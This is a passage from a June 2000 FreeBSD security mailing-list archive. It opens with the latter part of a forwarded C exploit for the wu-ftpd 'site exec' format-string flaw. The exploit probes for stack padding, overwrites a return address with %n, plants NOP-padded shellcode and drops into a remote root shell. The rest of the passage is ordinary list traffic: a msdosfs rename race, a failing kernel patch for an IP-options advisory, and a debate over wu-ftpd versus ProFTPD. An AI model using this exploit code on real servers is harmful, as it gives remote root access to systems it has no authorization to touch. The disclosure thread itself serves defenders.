fprintf(stderr,"EOF\n"); > exit(2); > } > if(send(sock,buff,n,0)<0) break; > } > usleep(10); > } > fprintf(stderr,"Connection aborted, select failed()\n"); > exit(0); >} > >int magic_check_f(int sock, char *str) { > char q[2048], ans[2048]; > > snprintf(q, 2048, "site exec %s%s\r\n", str, "%.f"); > if( strstr( q, "\r\n") == NULL) { > fprintf(stderr,"Line TOO big..\n"); > exit(-1); > } > ftp_siteexec(sock, q, strlen(q), 1, ans, 2048); > if( before_len+10 < strlen(&ans[3]) ) return 0; > before_len=strlen(&ans[3]); > (void)strcat(str,"%.f"); > return 1; >} >int magic_check_o(int sock, char *str) { > char q[2048], ans[2048]; > snprintf(q, 2048, "site exec %s%s\r\n", str, "%c"); > if( strstr( q, "\r\n") == NULL) { > fprintf(stderr,"Line TOO big..\n"); > exit(-1); > } > ftp_siteexec( sock, q, strlen(q), 1, ans, 2048); > if( before_len== strlen(&ans[3]) ) { > before_len+=1; > (void)strcat(str, "%d"); > return 3; > } > before_len=strlen(&ans[3]); > (void)strcat(str,"%c"); > return 2; >} > >int magic_check_ok( int sock, char *str) >{ > char q[2048], ans[2048]; > int i ,n=1, f, padding=0; > > snprintf(q, 2048,"site exec aaaaaaaa%s%s\r\n", str, "%p%p"); > if ( strstr(q, "\r\n" ) == NULL) { > fprintf(stderr, "Line too long\n"); > exit(-1); > } > (void)bzero(ans, 2048); > ftp_siteexec(sock, q, strlen(q), 1, ans, 2047); > if(strstr(ans,"0x61616161")==NULL) > return 0; > for(i =0; i < MAX_MAGIC && magic[i]; i++); > magic_d[i]=4; > while(n){ > for(f=0; f< 2; f++) { > snprintf(q, 2048,"site exec %.*saaaa%s%s\r\n", padding, "xxxx", str, > f?"%p%p":"%p"); > (void)bzero(ans, 2048); > ftp_siteexec(sock, q, strlen(q), 1, ans, 2047); > if( strstr(ans, "0x61616161")!=NULL) { > if (f==0) { > magic[i]=padding; > return 1; > } else if( f==1) { > strcat(str,"%p"); > magic[i]=padding; > return 1; > } > } > } > if(padding > 4) { > fprintf(stderr,"Cannot calculate padding..\n"); > exit(1); > } > padding++; > } > return 1; >} > > >int magic_digger(int sock) >{ > int get_out=1,where=0,all_failed=MAX_FAILED*2,f=0,o=0; > > if(magic_str==NULL){ > if((magic_str=(char*)malloc(4092))==NULL){ > perror("malloc"); > exit(errno); > } > } > (void)bzero(magic_str, 4092); > where=0; > while(get_out) { > int q; > if( where >= MAX_MAGIC-1 || all_failed <= 0 ) > return -1; > if( magic_check_f(sock, magic_str) ) { > o=0,f++; > if(f==1){ > if(!magic[where]) > magic[where]=1; > else > magic[++where]+=1; > magic_d[where]=1; > } else > magic[where]+=1; > all_failed=MAX_FAILED*2; > printf("%s", "%.f"); fflush(stdout); > goto verify; > } > all_failed--; > if((q=magic_check_o(sock,magic_str))){ > f=0,o++; > if(o==1){ > if(!magic[where]) > magic[0]=1; > else > magic[++where]+=1; > magic_d[where]=q; > } else { > if(magic_d[where]==q) > magic[where]+=1; > else { > magic[++where]=1; > magic_d[where]=q; > } > } > all_failed=MAX_FAILED*2; > printf("%s", q==2?"%c":"%d"); > fflush(stdout); > goto verify; > } > all_failed--; > continue; > verify: > if(magic_check_ok(sock,magic_str)){ > putchar('\n'); > return 0; > } > } > return 0; >} > >int main(int argc, char *argv[]){ > char *buff, *buff_p, *buff_p2, c, > shellcode[500],*dir,*passwd=shellcode; > int i, sock, num=-2, padding=-1, gm=0, > testmode=0,mtype=0,bla=0,offset=0; > u_long ret_addr=0, pass_addr=0; > for(i=0;targ[i].os_descr!=NULL;i++); > while((c=getopt(argc,argv,"t:l:m:o:s:r:p:M:P:xghH?"))!=EOF){ > switch(c) { > case 't': target=optarg;break; > case 'l': > username=optarg; > passwd=strchr(optarg,'/'); > if(passwd==NULL) > usage(argv[0],0); > *passwd++=(char)0; > break; > case 'x': testmode=1; break; > case 'o': offset=atoi(optarg);break; > case 'p': pass_addr=strtoul(optarg, &optarg,16); break; > case 'g': gm=1; break; > case 'M': dir=optarg;mtype=1;break; > case 'm': > { > int where=0; > if(!*optarg) { > fprintf(stderr,"-m requires argument, try -h for help\n"); > exit(1); > } > while(1) { > magic[where]=strtoul(optarg,&optarg,16); > optarg=strchr(optarg,','); > if(optarg==NULL){ > printf("comma missing\n"); > exit(1); > } > optarg++; > magic_d[where++]=strtoul(optarg,&optarg,16); > if(strchr(optarg,':')==NULL){ > magic[where]=magic_d[where]=0; > break; > } > optarg=strchr(optarg,':'); > optarg++; > } > } > break; > case 's':/* > num=atoi(optarg); > if(num>i) { > fprintf(stderr,"systype too big, try -h for help\n"); > exit(1); > } :) */ > break; > case 'r': > ret_addr=strtoul(optarg,&optarg,16); > break; > case 'P': > padding=atoi(optarg); > break; > case 'H': > bla=2; > default: usage(argv[0],bla);break; > } > } > if(target==NULL){ > fprintf(stderr,"No target specified, try -h for help\n"); > exit(1); > } > if(num==-1||num==-2) { > for(i=0;!targ[i].def;i++); > num=i; > } > (void)memcpy((void*)&getit,(void*)&targ[num],sizeof(struct targets)); > > if(magic[1]!=0) { > memcpy((void*)getit.magic,magic,sizeof(magic)); > memcpy((void*)getit.magic_d,magic_d,sizeof(magic)); > } > > if(ret_addr)getit.addr_ret_addr=ret_addr; > if(pass_addr)getit.pass_addr=pass_addr; > > getit.addr_ret_addr+=(offset*4); > > sock=connect_to_server(target); > memset(shellcode, '\x90', sizeof(shellcode)); > shellcode[sizeof(shellcode)-1]=(char)0; > if(!mtype){ > >memcpy((void*)&shellcode[sizeof(shellcode)-strlen(getit.shellcode)-1],(void >*)getit.shellcode, strlen(getit.shellcode)+1); > shellcode[sizeof(shellcode)-1]=(char)0; > }else{ > >memcpy((void*)&shellcode[250-strlen(getit.shellcode)-1],(void*)getit.shellc >ode,strlen(getit.shellcode)); > shellcode[250-1]=(char)0; > } > printf("Target: %s (%s/%s): > %s\n",target,username,*passwd=='\x90'?"":passwd,getit.os_descr); > printf("Return Address: 0x%08lx, AddrRetAddr: 0x%08lx, Shellcode: > %d\n\n",getit.pass_addr,getit.addr_ret_addr,strlen(getit.shellcode)); > > buff=(char *)malloc(1024); > bzero(buff,1024); > > (void)ftp_recv(sock,NULL,0,1); > > (void)ftp_login(sock,username,passwd); > > if(gm||(magic_str==NULL&&getit.magic[0]==0)){ > printf("STEP 2A: Generating magic string: "); > fflush(stdout); > magic_digger(sock); > memcpy((void *)getit.magic,(void*)magic,sizeof(magic)); > memcpy((void*)getit.magic_d,(void*)magic_d,sizeof(magic_d)); > printf("STEP 2B: MAGIC STRING: ["); > } else { > printf("STEP 2 : Skipping, magic number already exists: ["); > } > for(i=0;i printf("%02X,%02X",getit.magic[i],getit.magic_d[i]); > if(getit.magic[i+1]!=0) > putchar(':'); > } > printf("]\n"); > buff=(char *)realloc(buff, 4092); > (void)bzero(buff, 4092); > if(mtype) > ftp_mkchdir(sock,dir,shellcode); > printf("STEP 3 : Checking if we can reach our return address by > format string\n"); > if(!magic_str){ > magic_str=(char*)malloc(2048); > if(magic_str==NULL) { > perror("malloc"); > exit(errno); > } > (void)bzero(magic_str,2048); > for(i=0;i switch(getit.magic_d[i]) { > case 1: > for(num=0;num break; > case 2: > for(num=0;num break; > case 3: > for(num=0;num break; > case 4:if(padding<0)padding=getit.magic[i];break; > default:fprintf(stderr,"STEP 3: INternal error\n"); > exit(1); > break; > } > } > } > if(padding<0){ > for(num=0;num if(num<(MAX_MAGIC-1)) > padding=getit.magic[num]; > else > fprintf(stderr,"WARNING: PROBLEMS WITH PADDING\n"); > } > > if(!getit.islinux){ > if(!testmode) > snprintf(buff,4096,"site exec > %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(get > it.addr_ret_addr),magic_str,"%p"); > else > snprintf(buff,4096,"site exec > %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(get > it.pass_addr),magic_str,"%p"); > } else { > if(!testmode) > snprintf(buff,4096,"site exec > %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET > (getit.addr_ret_addr),magic_str,"%p"); > else > snprintf(buff,4096,"site exec > %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET > (getit.pass_addr),magic_str,"%p"); > } > sleep(getit.delay); > fflush(stdout); > if((buff_p=(char *)malloc(4096))==NULL){ > fprintf(stderr,"malloc failed.\n"); > exit(1); > } > (void)bzero(buff_p,4096); > ftp_siteexec(sock,buff,strlen(buff),1,buff_p,4095); > if((buff_p2=strchr(buff_p,'\r'))!=NULL) > *buff_p2=(char)0; > if((buff_p2=strchr(buff_p,'\n'))!=NULL) > *buff_p2=(char)0; > buff_p2=strstr(buff_p,"|0x"); > if(buff_p2==NULL){ > fprintf(stderr,"Fix me, incorrect response from > '%%p':%s\n",buff_p); > exit(1); > } > buff_p2+=3; > if(!testmode) > printf("STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx > ^C me now)\n",buff_p2,getit.addr_ret_addr); > else > printf("STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx > ^C me now)\n",buff_p2,getit.pass_addr); > sleep(getit.delay); > buff_p2=strstr(buff, "%.f"); > *buff_p2++=(char )0; > strcpy(buff_p, buff); > if(!testmode) > >sprintf(buff_p+strlen(buff_p),"%s%u%c","%d%.",(u_int)getit.pass_addr,'d'); > else > sprintf(buff_p+strlen(buff_p),"%s","%d%d"); > strcpy(buff_p+strlen(buff_p), buff_p2); > buff_p2=strchr(buff_p,'|'); > buff_p2++; > printf("STEP 5 : Sending code.. this will take about 10 seconds.\n"); > if(!testmode){ > strcpy(buff_p2,"%n\r\n"); > ftp_send(sock,buff_p,strlen(buff_p),0,NULL,0); > } else { > (void)bzero(buff,4096); > strcpy(buff_p2,"%s\r\n"); > ftp_send(sock,buff_p,strlen(buff_p),1,buff,4092); > printf("got answer: %s\n",buff); > exit(0); > } > free(buff_p); > free(buff); > signal(SIGINT, SIG_IGN); > signal(SIGHUP, SIG_IGN); > printf(RED"Press ^\\ to leave shell"NORM"\n"); > process_possibly_rooted(sock); > return 0; >} -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 19:12:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail-relay.eunet.no (mail-relay.eunet.no [193.71.71.242]) by hub.freebsd.org (Postfix) with ESMTP id 2696D37B59E for ; Thu, 22 Jun 2000 19:12:31 -0700 (PDT) (envelope-from mbendiks@eunet.no) Received: from login-1.eunet.no (login-1.eunet.no [193.75.110.2]) by mail-relay.eunet.no (8.9.3/8.9.3/GN) with ESMTP id EAA57962; Fri, 23 Jun 2000 04:12:29 +0200 (CEST) (envelope-from mbendiks@eunet.no) Received: from localhost (mbendiks@localhost) by login-1.eunet.no (8.9.3/8.8.8) with ESMTP id EAA82637; Fri, 23 Jun 2000 04:12:29 +0200 (CEST) (envelope-from mbendiks@eunet.no) X-Authentication-Warning: login-1.eunet.no: mbendiks owned process doing -bs Date: Fri, 23 Jun 2000 04:12:29 +0200 (CEST) From: Marius Bendiksen To: Bruce Evans Cc: security@FreeBSD.ORG Subject: Re: msdosfs_vnops.c : msdosfs_rename() In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > It is supposed to be locked by setting IN_RENAME in ip->i_flag. Note that > IN_RENAME is only set in the doingdirectory case. According to the comments, nothing is locked at all. > I don't completely trust relookup(), however. In theory, the filesystem > tree may be almost arbitrarily rearranged while relookup() sleeps, since > relookup() doesn't hold many locks (in particular, it doesn't hold locks > on the directories being changed or their parents or grandparents until > it searches back down to them). I once made this happen in practice by > forcing some long sleeps and doing the rearrangement in another process. > There seemed to be problems, but I wasn't sure and have forgotten the > details. This is what I am talking about. It is, from what I see, possible to cause a problem by rearranging the directory (specifically, removing the source name) during a relookup. This would then cause a panic. Marius To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 19:16:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from web216.mail.yahoo.com (web216.mail.yahoo.com [128.11.68.116]) by hub.freebsd.org (Postfix) with SMTP id 06F0937B572 for ; Thu, 22 Jun 2000 19:16:44 -0700 (PDT) (envelope-from hho321@yahoo.com) Received: (qmail 14535 invoked by uid 60001); 23 Jun 2000 02:16:43 -0000 Message-ID: <20000623021643.14531.qmail@web216.mail.yahoo.com> Received: from [207.172.11.148] by web216.mail.yahoo.com; Thu, 22 Jun 2000 19:16:43 PDT Date: Thu, 22 Jun 2000 19:16:43 -0700 (PDT) From: Hugh Ho Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options To: Todd Backman Cc: security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I got the same error, but I managed to modify the source files manually by reading the patch. -Hugh --- Todd Backman wrote: > > So, upon following the instructions for patch on the SA (including DL'ing > the patch from the ftp site) I get the following: > > **** START **** > > stuff# patch -p < ip-options.diff > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_icmp.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > |retrieving revision 1.39 > |diff -u -r1.39 ip_icmp.c > |--- ip_icmp.c 2000/01/28 06:13:09 1.39 > |+++ ip_icmp.c 2000/06/08 15:26:39 > -------------------------- > Patching file ip_icmp.c using Plan A... > Hunk #1 failed at 662. > 1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_input.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_input.c,v > |retrieving revision 1.130 > |diff -u -r1.130 ip_input.c > |--- ip_input.c 2000/02/23 20:11:57 1.130 > |+++ ip_input.c 2000/06/08 15:25:46 > -------------------------- > Patching file ip_input.c using Plan A... > Hunk #1 failed at 1067. > Hunk #2 failed at 1178. > 2 out of 2 hunks failed--saving rejects to ip_input.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_output.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_output.c,v > |retrieving revision 1.99 > |diff -u -r1.99 ip_output.c > |--- ip_output.c 2000/03/09 14:57:15 1.99 > |+++ ip_output.c 2000/06/08 15:27:08 > -------------------------- > Patching file ip_output.c using Plan A... > Hunk #1 failed at 1302. > 1 out of 1 hunks failed--saving rejects to ip_output.c.rej > done > > **** FINISH **** > > Can anyone hit me with the cluestick? > > Thanks. > > - Todd > > > On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote: > > > # cd /usr/src/sys/netinet > > # patch -p < /path/to/patch_or_advisory > > > > Index: ip_icmp.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > > retrieving revision 1.39 > > diff -u -r1.39 ip_icmp.c > > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > > +++ ip_icmp.c 2000/06/08 15:26:39 > > @@ -662,8 +662,11 @@ > > if (opt == IPOPT_NOP) > > len = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + break; > > len = cp[IPOPT_OLEN]; > > - if (len <= 0 || len > cnt) > > + if (len < IPOPT_OLEN + sizeof(*cp) || > > + len > cnt) > > break; > > } > > /* > > Index: ip_input.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > > retrieving revision 1.130 > > diff -u -r1.130 ip_input.c > > --- ip_input.c 2000/02/23 20:11:57 1.130 > > +++ ip_input.c 2000/06/08 15:25:46 > > @@ -1067,8 +1067,12 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > > + goto bad; > > + } > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= 0 || optlen > cnt) { > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > > code = &cp[IPOPT_OLEN] - (u_char *)ip; > > goto bad; > > } > > @@ -1174,6 +1178,10 @@ > > break; > > > > case IPOPT_RR: > > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > + goto bad; > > + } > > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > goto bad; > > Index: ip_output.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > > retrieving revision 1.99 > > diff -u -r1.99 ip_output.c > > --- ip_output.c 2000/03/09 14:57:15 1.99 > > +++ ip_output.c 2000/06/08 15:27:08 > > @@ -1302,8 +1302,10 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + goto bad; > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= IPOPT_OLEN || optlen > cnt) > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > > goto bad; > > } > > switch (opt) { > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message __________________________________________________ Do You Yahoo!? Get Yahoo! Mail - Free email you can access from anywhere! http://mail.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 19:28:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from server1.mich.com (server1.mich.com [198.108.16.2]) by hub.freebsd.org (Postfix) with ESMTP id D0FC537B523 for ; Thu, 22 Jun 2000 19:28:30 -0700 (PDT) (envelope-from will@almanac.yi.org) Received: from argon.gryphonsoft.com (pm014-041.dialup.bignet.net [64.79.82.153]) by server1.mich.com (8.9.3/8.9.3) with ESMTP id WAA32661; Thu, 22 Jun 2000 22:28:20 -0400 Received: by argon.gryphonsoft.com (Postfix, from userid 1000) id DF82C195F; Thu, 22 Jun 2000 22:26:33 -0400 (EDT) Date: Thu, 22 Jun 2000 22:26:33 -0400 From: Will Andrews To: Todd Backman Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options Message-ID: <20000622222633.C67587@argon.gryphonsoft.com> References: <20000622215052.D642E37BF12@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from todd@flyingcroc.net on Thu, Jun 22, 2000 at 05:01:06PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 22, 2000 at 05:01:06PM -0700, Todd Backman wrote: > Can anyone hit me with the cluestick? Sure. Try having an up-to-date FreeBSD source tree. :-) In that case you won't even need the patches. :-) -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 20:34:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 0F39B37B5AF for ; Thu, 22 Jun 2000 20:34:31 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 65812 invoked by uid 1000); 23 Jun 2000 03:34:30 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 23 Jun 2000 03:34:30 -0000 Date: Thu, 22 Jun 2000 22:34:30 -0500 (CDT) From: Mike Silbersack To: Mike Tancsa Cc: freebsd-security@FreeBSD.org Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: <4.2.2.20000622201823.0479a690@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hm, given the number of explots for wu-ftpd in the last year and a half, I wonder if it should just be removed from the ports tree based on the assumption that there are more, and it's just a risk. (Does anyone actually still run it?) Mike "Silby" Silbersack On Thu, 22 Jun 2000, Mike Tancsa wrote: > > For those of you who missed it on Bugtraq :-( > > ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 20:38:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1A5EE37B854 for ; Thu, 22 Jun 2000 20:38:48 -0700 (PDT) (envelope-from mike@sentex.net) Received: from chimp ([192.168.0.2]) by cage.simianscience.com (8.9.3/8.9.3) with ESMTP id XAA02508; Thu, 22 Jun 2000 23:38:41 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 22 Jun 2000 23:34:26 -0400 To: Mike Silbersack From: Mike Tancsa Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 Cc: freebsd-security@FreeBSD.org In-Reply-To: References: <4.2.2.20000622201823.0479a690@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: >Hm, given the number of explots for wu-ftpd in the last year and a half, I >wonder if it should just be removed from the ports tree based on the >assumption that there are more, and it's just a risk. > >(Does anyone actually still run it?) A lot of people run it still. I would use the stock ftpd with FreeBSD if there was a better way to control anon uploads. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 21: 8:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 3DFA537B69F for ; Thu, 22 Jun 2000 21:08:47 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 85357 invoked by uid 1000); 23 Jun 2000 04:08:46 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 23 Jun 2000 04:08:46 -0000 Date: Thu, 22 Jun 2000 23:08:46 -0500 (CDT) From: Mike Silbersack To: Mike Tancsa Cc: freebsd-security@FreeBSD.org Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: <4.2.2.20000622233159.0351a7d8@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 22 Jun 2000, Mike Tancsa wrote: > At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: > >Hm, given the number of explots for wu-ftpd in the last year and a half, I > >wonder if it should just be removed from the ports tree based on the > >assumption that there are more, and it's just a risk. > > > >(Does anyone actually still run it?) > > A lot of people run it still. I would use the stock ftpd with FreeBSD if > there was a better way to control anon uploads. > > ---Mike Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like the only other full-featured one. Well, I'm getting glad I don't need to run a ftpd. :) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 21:22:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailbox.mcs.net (Mailbox.mcs.com [192.160.127.87]) by hub.freebsd.org (Postfix) with ESMTP id 1A23F37B5A4 for ; Thu, 22 Jun 2000 21:22:27 -0700 (PDT) (envelope-from spikeman@myself.com) Received: from myself.com (spikeman@nemean.spikeman.net [204.137.229.4]) by mailbox.mcs.net (8.9.3/8.9.3) with ESMTP id XAA17387; Thu, 22 Jun 2000 23:22:18 -0500 (CDT) (envelope-from spikeman@myself.com) Message-ID: <3952E620.2D8BC3A1@myself.com> Date: Thu, 22 Jun 2000 23:22:57 -0500 From: Spikeman Organization: SDN - http://www.spikeman.net X-Mailer: Mozilla 4.7 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: Mike Silbersack Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ProFTPD does really where.. there were some explots in it in younger versions but by fair not as many as Wu FTPD... Mike Silbersack wrote: > On Thu, 22 Jun 2000, Mike Tancsa wrote: > > > At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: > > >Hm, given the number of explots for wu-ftpd in the last year and a half, I > > >wonder if it should just be removed from the ports tree based on the > > >assumption that there are more, and it's just a risk. > > > > > >(Does anyone actually still run it?) > > > > A lot of people run it still. I would use the stock ftpd with FreeBSD if > > there was a better way to control anon uploads. > > > > ---Mike > > Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like > the only other full-featured one. Well, I'm getting glad I don't need to > run a ftpd. :) > > Mike "Silby" Silbersack > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ___ /\ \ phase two of global domination in operation, hide all lions. /::\ \ /:/\:\ \ Comments or Questions email spikeman@myself.com _\:\~\:\ \ /\ \:\ \:\__\ Spikeman spikeman@myself.com \:\ \:\ \/__/ http://www.spikeman.net \:\ \:\__\ Find Me On EFNET /whois Spikeman \:\/:/ / \::/ / Friends are lights in winter; \/__/ The older the friend, the brighter the light. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 21:29: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id 9B83B37B8AF for ; Thu, 22 Jun 2000 21:29:04 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (control.fpsn.net [63.224.69.60]) by mail.fpsn.net (8.9.3/8.9.3) with ESMTP id WAA76644; Thu, 22 Jun 2000 22:24:16 -0600 (MDT) (envelope-from cfaber@fpsn.net) Message-ID: <3952E6B5.7123A453@fpsn.net> Date: Thu, 22 Jun 2000 22:25:25 -0600 From: Colin Faber Reply-To: cfaber@fpsn.net Organization: fpsn.net, Inc. X-Mailer: Mozilla 4.6 [en] (Win95; I) X-Accept-Language: en MIME-Version: 1.0 To: Spikeman Cc: Mike Silbersack , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 References: <3952E620.2D8BC3A1@myself.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Agreed, with a correctly setup ProFTPD you can't got wrong, Much more powerful then the stock FTPd and many less exploits then WU's stuff. Spikeman wrote: > > ProFTPD does really where.. there were some explots in it in younger > versions but by fair not as many as Wu FTPD... > > Mike Silbersack wrote: > > > On Thu, 22 Jun 2000, Mike Tancsa wrote: > > > > > At 10:34 PM 6/22/2000 -0500, Mike Silbersack wrote: > > > >Hm, given the number of explots for wu-ftpd in the last year and a half, I > > > >wonder if it should just be removed from the ports tree based on the > > > >assumption that there are more, and it's just a risk. > > > > > > > >(Does anyone actually still run it?) > > > > > > A lot of people run it still. I would use the stock ftpd with FreeBSD if > > > there was a better way to control anon uploads. > > > > > > ---Mike > > > > Hm, yeah, I tried searching freshmeat for ftpds, and proftpd seems like > > the only other full-featured one. Well, I'm getting glad I don't need to > > run a ftpd. :) > > > > Mike "Silby" Silbersack > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > ___ > /\ \ phase two of global domination in operation, hide all lions. > /::\ \ > /:/\:\ \ Comments or Questions email spikeman@myself.com > _\:\~\:\ \ > /\ \:\ \:\__\ Spikeman spikeman@myself.com > \:\ \:\ \/__/ http://www.spikeman.net > \:\ \:\__\ Find Me On EFNET /whois Spikeman > \:\/:/ / > \::/ / Friends are lights in winter; > \/__/ The older the friend, the brighter the light. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 23: 7:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net 